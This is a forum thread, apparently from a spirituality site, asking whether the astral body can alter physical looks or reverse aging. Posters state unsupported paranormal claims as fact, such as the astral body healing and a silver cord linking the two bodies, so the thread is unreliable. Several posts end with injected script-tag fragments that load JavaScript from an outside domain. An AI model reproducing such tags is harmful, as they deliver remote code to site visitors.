While out of the body,does anyone here think it is possible that our astral selves can alter our physical structures.We all know that the astral body can heal,also thought triggers off the astral body which is how the astral body travels.We think New York and we are there in mere seconds.So i ask you, is it possible for us to change how we look physically,can our astral body reverse the aging process ,just by

Mind and body are separated when you astral project. There is no any influence you could possibly do. Try your goals trough meditation. Then mind and body can interact, but I don't see reason to enchant your body, your spirit is one who need to grow. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

You are partially correct I will say; although the astral body and the physical body are connected through a chord made of energy, this chord is sort of like a life line connecting the life force of both bodies. Through this the physical body is indeed "aware" (as you put it) of the astral body. You may be thinking of etheric projection when the subtle body takes over all vital signs- or rather- bodily functions.
The astral body is much more powerful than the mental body or abstract mind; it takes more energy to stay active and ultimately, become more noticeable.
Being both slightly noticeable and having the ability to effect the physical body ('Sleeping Death Syndrome' is a class a example) can in turn effect what is physical. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
About that chord your speaking, I don't personally have it. In astral we know what we imagine it's there. That cord is just there to feel you safer on returning.
I know what are you trying to say, but logically it's not possible,even if it is, you would need to live one life twice in order to achieve that.
